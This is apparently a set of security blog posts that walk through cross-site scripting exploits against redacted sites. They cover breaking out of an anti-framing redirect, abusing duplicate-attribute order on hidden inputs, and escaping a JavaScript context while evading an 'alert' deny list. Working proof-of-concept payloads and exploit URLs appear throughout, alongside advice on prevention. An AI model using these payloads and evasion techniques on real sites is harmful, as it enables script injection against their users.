-
It is on occasion necessary to persuade a developer that an HTML injection vuln capitulates to exploitation notwithstanding the presence within of a redirect that conducts the browser away from the exploit’s embodied
alert()
. Sometimes, parsing an expression takes more effort than breaking it.
Turn your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with:
https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="
The page reflects the value of this
id
parameter within an
href
attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:
<a href="mailto:support@redacted?subject=error ref: "onmouseover=alert(9);a=""> support@redacted </a>
Yet the browser goes into an infinite redirect loop without ever launching the
alert
. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the
<body>
element – well after several other JavaScript functions and page content. It should have been present in the
<head>
. It’s like the developers knew they should do something about clickjacking, heard about a
top.location
trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)
<script> if (window.top.location != 'https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="') { window.top.location.href = 'https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="'; } </script>
The URL in your browser bar may look exactly like the URL in the inequality test. However, the
location.href
property contains the URL-encoded (a.k.a. percent-encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the new
location.href
. As such, the following two strings are not identical:
https://redacted/UnknownError.aspx?id=%22onmouseover=alert(9);a=%22
https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="
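The mismatch can be reproduced outside the browser. The sketch below assumes a runtime with the WHATWG `URL` class (Node.js or a modern browser) and uses it as a stand-in for how `location.href` serializes the address. The variable names are illustrative, not taken from the page.

```javascript
// The string the server wrote into the page, quotation marks intact.
const reflected = 'https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="';

// The URL parser percent-encodes the quotation marks in the query string,
// much as the browser does when it populates location.href.
const serialized = new URL(reflected).href;

// Mirrors the page's inequality test: the strings differ, so the
// anti-framing code would take the redirect branch.
const wouldRedirect = serialized != reflected;

console.log(serialized);
console.log(wouldRedirect);
```

Because the page keeps writing the unencoded form back into the comparison, the test never settles, which is consistent with the redirect loop described above.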
Since the anti-framing triggers before the browser encounters the affected
href
, the
onmouseover
payload (or any other payload inserted in the tag) won’t trigger.
This isn’t a problem. Just redirect your
onhack
event from the
href
to the
if
statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected. Keeping the browser on the page makes the exploit more obvious.
JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the
alert()
and a Boolean operator to force a false outcome.
The new payload is
'+alert(9)&&null=='
Which results in this:
<script> if (window.top.location != 'https://redacted/UnknownError.aspx?id='+alert(9)&&null=='') { window.top.location.href = 'https://redacted/UnknownError.aspx?id='+alert(9)&&null==''; } </script>
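To see why this conditional both fires the payload and skips the redirect, here is a minimal sketch that evaluates the same expression outside the browser. The `alert` stub and the `topLocation` value are assumptions made so the code runs anywhere; only the shape of the expression comes from the page.

```javascript
// Stand-in for the browser's alert(); like the real one, it returns undefined.
const shown = [];
const alert = (value) => { shown.push(value); };

// Hypothetical value of window.top.location once the browser has encoded the URL.
const topLocation = "https://redacted/UnknownError.aspx?id=%27+alert(9)&&null==%27";

// The injected test. Operator precedence groups it as:
//   (topLocation != ('...?id=' + alert(9))) && (null == '')
const condition =
  topLocation != 'https://redacted/UnknownError.aspx?id=' + alert(9) && null == '';

console.log(shown);     // [ 9 ]  alert() ran while the condition was evaluated
console.log(condition); // false  so the redirect branch is skipped
```

The left operand is true (the concatenated string ends in `undefined`), but `null == ''` is false, so the whole `&&` expression is false.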
Note that we could have used other operators to glue the
alert()
to its preceding string. Any arithmetic operator would have worked.
We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternatives. Perhaps the presence of “null” might flag the URL as a SQL injection attempt. We wouldn’t want to be defeated by a lucky WAF rule. All of the following alternate tests return false:
undefined == ''
[] != ''
[] === ''
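These are easy to confirm in any JavaScript console. The sketch below simply evaluates each test; the `alternates` object is only a convenient way to label the results.

```javascript
// Each value is the result of the expression named by its key.
const alternates = {
  "undefined == ''": undefined == '', // undefined only loosely equals null/undefined
  "[] != ''": [] != '',               // [] coerces to '', so the inequality is false
  "[] === ''": [] === '',             // strict comparison of an object and a string
};

for (const [expression, result] of Object.entries(alternates)) {
  console.log(expression, '->', result);
}
```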
This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with different execution contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g.
<script>
) after the
href
, but the
if
statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page – URL encoding would have been a logical step.
• • • -
Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this, but be prepared for complex elements and attributes. And good luck dealing with code inside
<script>
tags.
Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that bypasses validation filters and evades output encoding. Sometimes it’s necessary to explore the dusty passages of shrines to parsing standards in search of a hidden door that reveals an exploit path.
HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.
Every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of a hidden
input
field. In the following example, note that the quotation mark has not been filtered or encoded.
https://web.site/search?sortOn=x"
<input type="hidden" name="sortOn" value="x"">
If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a
<z"
sequence to consume the leftover characters. A
<z>
tag with an empty attribute is harmless.
https://web.site/search?sortOn=x"><script>alert(9)</script><z"
<input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">
Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.
<input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">
Or, taking advantage of new HTML5 events, we’d use the
onfocus
event to execute the JavaScript rather than wait for a mouseover.
<input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">
The catch here is that the hidden
input
type doesn’t receive those events and therefore won’t trigger the
alert
. But it’s not yet time to give up. We could work on a theory that changing the
input
type would enable the field to receive these events.
<input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">
Fortunately, modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, 8.1.2.3 Attributes:
There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.
Okay, we have a constraint, but no instructions on how to handle this error condition. Without further instructions, it’s not clear how a browser should handle duplicate attribute names. Ambiguity leads to security problems – it’s to be avoided at all costs.
From the spec, 8.2.4.35 Attribute name state:
When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).
So, we’ll never be able to fool a browser by “casting” the
input
field to a different type with a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.
(The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines its parsing rules in section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)
Think back to our injection example. Imagine the order of attributes were different for the vulnerable
input
tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.
<input name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >
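The “first attribute wins” rule is simple enough to model. What follows is a rough sketch, not a tokenizer: `keepFirstAttributes` is a hypothetical helper, and the attribute pairs are hand-written approximations of what a parser would extract from the two `input` tags shown earlier.

```javascript
// Hypothetical helper: applies the "drop the later duplicate" rule to a list of
// [name, value] pairs that a tokenizer has already split out of a start tag.
function keepFirstAttributes(pairs) {
  const kept = new Map();
  for (const [name, value] of pairs) {
    // Approximates the spec's ASCII case-insensitive name matching.
    const key = name.toLowerCase();
    if (!kept.has(key)) {
      kept.set(key, value);
    }
  }
  return kept;
}

// The site's type attribute comes first, so the injected one is dropped.
const typeFirst = keepFirstAttributes([
  ['type', 'hidden'], ['name', 'sortOn'], ['value', 'x'],
  ['type', 'text'], ['autofocus', ''], ['onfocus', 'alert(9)//"'],
]);

// The injected type attribute comes first, so the site's one is dropped.
const typeLast = keepFirstAttributes([
  ['name', 'sortOn'], ['value', 'x'],
  ['type', 'text'], ['autofocus', ''], ['onfocus', 'alert(9)//"'],
  ['type', 'hidden'],
]);

console.log(typeFirst.get('type')); // hidden
console.log(typeLast.get('type'));  // text
```

The only thing that changes between the two calls is attribute order, which is exactly the detail the injection depends on.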
HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection. However, the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.
Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as “the absence of unmitigatable surprise”.
Look for flaws in modern browsers where this trick works, e.g. maybe a compatibility mode or not using an explicit
<!doctype html>
weakens the browser’s parsing algorithm. With luck, most of the problems you discover will be implementation errors fixable within the affected browser rather than a design weakness in the spec.
HTML5 gives us a better design that minimizes parsing-based security problems. It’s up to web developers to give us better sites that maximize the security of our data.
• • • -
Should you find yourself sitting in a tin can, far above the world, it’s reasonable to feel like there’s nothing you can do. Stare out the window and remark that planet earth is blue.
Should you find yourself writing a web app, with security out of this world, then it’s reasonable to feel like there’s something you forgot to do.
Here’s a web app that seems secure against HTML injection. Yet with a little creativity it’s exploitable – just tell the browser what it wants to know. Like our distant Major Tom – the papers want to know whose shirts you wear.
Every countdown to an HTML injection exploit begins with a probe. Here’s a simple one:
https://web.site/s/ref=page?node="autofocus/onfocus=alert(9);//&search-alias=something
The site responds with a classic reflection inside an
<input>
field. However, it foils the attack by HTML encoding the quotation mark. After several attempts, we have to admit there’s no way to escape the quoted string:
<input type="hidden" name="url" value="https://web.site/s/ref=page?node=&quot;autofocus/onfocus=alert(9);//&search-alias=something">
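For reference, this is roughly what attribute encoding looks like. The site’s real encoder is unknown; `encodeForAttribute` is a hypothetical helper, and it encodes a few more characters than the quotation mark the site evidently handled.

```javascript
// Hypothetical encoder for text placed inside a double-quoted HTML attribute.
function encodeForAttribute(text) {
  return String(text)
    .replace(/&/g, '&amp;')  // must run first so later entities are not re-encoded
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

const probe = '"autofocus/onfocus=alert(9);//';
const tag =
  '<input type="hidden" name="url" value="' + encodeForAttribute(probe) + '">';

console.log(tag);
```

With the quotation mark turned into an entity, the probe stays inside the `value` attribute and never becomes a new attribute.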
Time to move on, but only from that particular payload. Diligence and attention to detail pay off. They’re a common theme around here.
Prior to mutating URL parameters, the original link looked like this:
https://web.site/s/ref=page?node=412603031&search-alias=something
One behavior that stood out for this page was the reflection of several URL parameters within a JavaScript block. In the original page, the JavaScript was minified and condensed to a single line. We’ll show the affected
<script>
block with whitespace added in order to more easily understand its semantics. Notice the appearance of the value
412603031
from the
node
parameter:
(function(w,d,e,o){
  var i='DAaba0';
  if(w.uDA=w.ues&&w.uet&&w.uex){ues('wb',i,1);uet('bb',i)}
  siteJQ.available('search-js-general', function(){
    SPUtils.afterEvent('spATFEvent', function(){
      o=w.DA;
      if(!o){
        o=w.DA=[];e=d.createElement('script');
        e.src='https://web.site/a.js';
        d.getElementsByTagName('head')[0].appendChild(e)
      }
      o.push({c:904,a:'site=redacted;pt=Search;pid=412603031',w:728,h:90,d:768,f:1,g:''})
    })
  })
})(window,document)
Basically, it’s an anonymous function that takes four parameters, two of which are evidently the
window
and
document
objects since those show up in the calling arguments. If you’re having trouble conceptualizing the previous JavaScript, consider this reduced version:
(function(w,d,e,o){
  var i='DAaba0';
  o=w.DA;
  if(!o){ o=w.DA=[] }
  o.push({c:904,a:'site=redacted;pid=XSS'})
})(window,document)
We need to refine the payload for the
XSS
characters in order to execute arbitrary JavaScript.
First we add sufficient syntax to terminate the preceding tokens, such as the function declaration and method calls. This is as straightforward as counting parentheses and such. For example, the following gets us to a point where the JavaScript engine parses correctly up to the point of the
XSS
payload.
(function(w,d,e,o){
  var i='DAaba0';
  o=w.DA;
  if(!o){ o=w.DA=[] }
  o.push({c:904,a:'site=redacted;pid='})
});XSS'})
})(window,document)
Notice in the previous example that we’ve closed the anonymous function, but there’s no need to execute it. This is the difference between
(function(){})()
and
(function(){})
– we omitted the final
()
since we’re trying to avoid parsing or execution errors preceding our payload.
Next, we find a payload that’s appropriate for the injection context. The reflection point is already within a JavaScript execution block. Thus, there’s no need to use a payload with
<script>
tags, nor do we need to rely on an intrinsic event like
onfocus()
.
The simplest payload in this case would be
alert(9)
. However, it appears the site might be rejecting any payload with the word “alert” in it. No problem, we’ll turn to a trivial obfuscation method:
window['a'+'lert'](9)
Since we’re trying to cram several concepts into this tutorial, we’ll wrap the payload inside its own anonymous function. Incidentally, this kind of syntax has the potential to horribly confuse regular expressions with which a developer intended to match balanced parentheses.
(function(){window['a'+'lert'](9)})()
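Here is a small sketch of why the obfuscation slips past a naive filter yet still reaches the same function. Everything in it is a stand-in: `win` plays the role of `window`, the stub records calls instead of opening a dialog, and `isBlocked` is a guess at the kind of deny list the site appeared to apply.

```javascript
// Stand-ins so the sketch runs outside a browser.
const calls = [];
const win = { alert: (value) => { calls.push(value); } };

// Hypothetical deny list: reject any input containing the word "alert".
const isBlocked = (input) => /alert/i.test(input);

console.log(isBlocked("alert(9)"));              // true
console.log(isBlocked("window['a'+'lert'](9)")); // false

// Property lookup by computed name resolves to the same function,
// with or without the anonymous function wrapper.
win['a' + 'lert'](9);
(function () { win['a' + 'lert'](9); })();

console.log(calls); // [ 9, 9 ]
```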
Recall that in the original site all of the JavaScript was condensed to a single line. This makes it easy for us to clean up the remaining tokens to ensure the browser doesn’t complain about any subsequent parsing errors. Otherwise, the contents of the JavaScript block may not be executed. Therefore, we’ll try throwing in an opening comment delimiter, like this:
(function(){window['a'+'lert'](9)})()/*
Oops. The payload fails. In fact, this was where one review of the vuln stopped. The payload never got so complicated as using the obfuscated alert, but it did include the trailing comment delimiter. Since the browser never executed any pop-ups, everyone gave up and called this a false positive. Oops.
Hackers can be as fallible as the developers that give us these nice vulns to chew on.
Take a look at the browser’s ever-informative error console. It tells us exactly what went wrong:
SyntaxError: Multiline comment was not closed properly
Everything following the payload falls on a single line. So, we really should have just used the single line comment delimiter:
(function(){window['a'+'lert'](9)})()//
And we’re done!
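The difference between the two delimiters can be checked without a browser. This sketch rebuilds the reduced, single-line script block around the payload and asks the JavaScript engine whether each variant parses. The `alert` call is swapped for a `hits.push()` so the effect is observable, and `parses` is a hypothetical helper.

```javascript
// The reduced script block as it looks after injection, all on one line.
const before = "(function(w,d,e,o){o=w.DA;if(!o){o=w.DA=[]}o.push({c:904,a:'site=redacted;pid='})});";
const payload = "(function(){hits.push(9)})()";
const after = "'})})(window,document)";

// Compile the source without running it and report whether it parsed.
function parses(source) {
  try {
    new Function('hits', source);
    return true;
  } catch (err) {
    if (err instanceof SyntaxError) return false;
    throw err;
  }
}

const blockComment = before + payload + '/*' + after;
const lineComment = before + payload + '//' + after;

console.log(parses(blockComment)); // false: the comment is never closed
console.log(parses(lineComment));  // true

// Only the payload's function runs; the site's function was closed, not called.
const hits = [];
new Function('hits', lineComment)(hits);
console.log(hits); // [ 9 ]
```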
(For extra points, try figuring out what the syntax might need to be if the JavaScript spanned multiple lines. Hint: This all started with an anonymous function.)
Here’s the whole payload inside the URL. Make sure to encode the plus operator as %2b – otherwise it’ll be misinterpreted as a space.
https://web.site/s/ref=page?node='})});(function(){window['a'%2b'lert'](9)})()//&search-alias=something
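The plus-sign pitfall is easy to demonstrate with `URLSearchParams`, which applies form-style decoding. Whether the target server decodes query strings the same way is an assumption, though many frameworks do.

```javascript
// A literal "+" is decoded as a space; "%2b" is decoded as a plus sign.
const rawPlus = new URLSearchParams("node=window['a'+'lert'](9)").get('node');
const encodedPlus = new URLSearchParams("node=window['a'%2b'lert'](9)").get('node');

console.log(rawPlus);     // window['a' 'lert'](9)
console.log(encodedPlus); // window['a'+'lert'](9)
```

The first result is no longer valid JavaScript, so the payload would die with a syntax error before it ever ran.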
And here’s the result within the
<script>
block.
(function(w,d,e,o){ ... o.push({c:904,a:'site=redacted;pid='}) });(function(){window['a'+'lert'](9)})()//'})})(window,document)
There are a few points to review in this example, starting with hints for discovering and exploiting HTML injection:
- Inspect the entire page for areas where a URL parameter name or value is reflected. Don’t stop at the first instance.
- Use a payload appropriate for the reflection context. In this case, we could use JavaScript because the reflection appeared within a <script> element.
- Write clean payloads. Terminate preceding tokens, comment out (or correctly open) subsequent tokens. Pay attention to messages reported in the browser’s error console.
- Don’t be foiled by sites that put alert or other strings on a deny list. Effective attacks don’t even need to use an alert() function. Know simple obfuscation techniques to bypass deny lists. (Obfuscation really just means an awareness of JavaScript’s objects, methods, and semantics plus creativity.)
- Use the JavaScript that’s already present. Most sites already have a library like jQuery loaded. Take advantage of $() to create new and exciting elements within the page.
And here are a few hints for preventing this kind of flaw:
- Use an encoding mechanism appropriate to the context where data from the client will be displayed. The site correctly used HTML encoding for " characters within the value attribute of an <input> tag, but forgot about dealing with the same value when it was inserted into a JavaScript context.
- Use string concatenation at your peril. Create helper functions that are harder to misuse.
- When you find one instance of a programming mistake, search the entire code base for other instances – it’s quicker than waiting for another exploit to appear.
- Accept that a deny list with alert won’t provide any benefit. Have an idea of how diverse HTML injection payloads can be.
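As one illustration of a helper that is harder to misuse, the sketch below encodes untrusted text for a JavaScript string context. `toScriptString` is a hypothetical name, and this is one common approach under stated assumptions rather than what the site should necessarily have shipped: `JSON.stringify` supplies the quoting and escaping, and a second pass escapes characters that could close the string or the surrounding `<script>` element.

```javascript
// Hypothetical helper: returns a complete, double-quoted JavaScript string
// literal that is safe to write inside a <script> block.
function toScriptString(value) {
  return JSON.stringify(String(value)).replace(
    /[<>&'\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

// The payload from the walkthrough, treated as plain data.
const probe = "'})});(function(){window['a'+'lert'](9)})()//";
const literal = toScriptString(probe);

// What the server would emit instead of concatenating the raw value.
console.log('var pid = ' + literal + ';');

// Evaluating the literal yields the original text, and nothing else runs.
const roundTrip = new Function('return ' + literal + ';')();
console.log(roundTrip === probe); // true
```

Because the helper returns the whole literal, quotes included, a caller has no opening to pick the wrong quote style or forget an escape.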
There’s nothing really odd about JavaScript syntax. It’s a flexible language with several ways of concatenating strings, casting types, and executing methods. We know developers can build sophisticated libraries with JavaScript. We know hackers can build sophisticated exploits with it.
We know Major Tom’s a junkie, strung out in Heaven’s high, hitting an all-time low. Have fun finding and fixing HTML injection vulns – I’m happy to do so. Hope you’re happy, too.
• • •